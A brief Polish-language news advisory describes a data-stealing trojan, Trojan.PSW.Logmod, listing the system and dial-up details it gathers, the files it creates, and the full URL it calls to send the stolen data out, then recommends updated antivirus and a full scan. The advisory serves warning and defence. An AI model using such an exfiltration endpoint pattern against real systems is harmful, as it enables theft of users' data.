Kradnący trojan
W Sieci pojawił się kolejny wirus należący do rodziny koni trojańskich kradnących dane - Trojan.PSW.Logmod. Specjalizuje się on w zdobywaniu następujących szczegółów: numer wersji systemu Windows oraz Explorera, wpisy książki telefonicznej, informacje o dostawcy internetu, dane RAS (Remote Access Service), rejestr modemu itd.
Szkodnik tworzy w folderze Windows pliki o nazwach: SysTrace.daf, CallTrace.daf oraz DialTrace.daf. Są one wykorzystywane do przechowywania ukradzionych danych. W celu wysyłania zebranych informacji trojan otwiera adres:
http://stats.internetsexprovider.com/resident/SysWeb.php3?
country=espana4&Login= %dane%
gdzie %dane% to wysyłane szczegóły.
Ponadto wirus tworzy na własny użytek dwa dodatkowe klucze w rejestrze systemowym.
Jeśli istnieje podejrzenie, że komputer mógł zostać zaatakowany przez PSW.Logmoda, należy zaopatrzyć się w najnowsze uaktualnienia do programu antywirusowego i przeprowadzić kompleksowe skanowanie systemu. W przypadku wykrycia podejrzanych plików, należy je usunąć.
(źródło: Web Express: http://www.weinfo.pl/)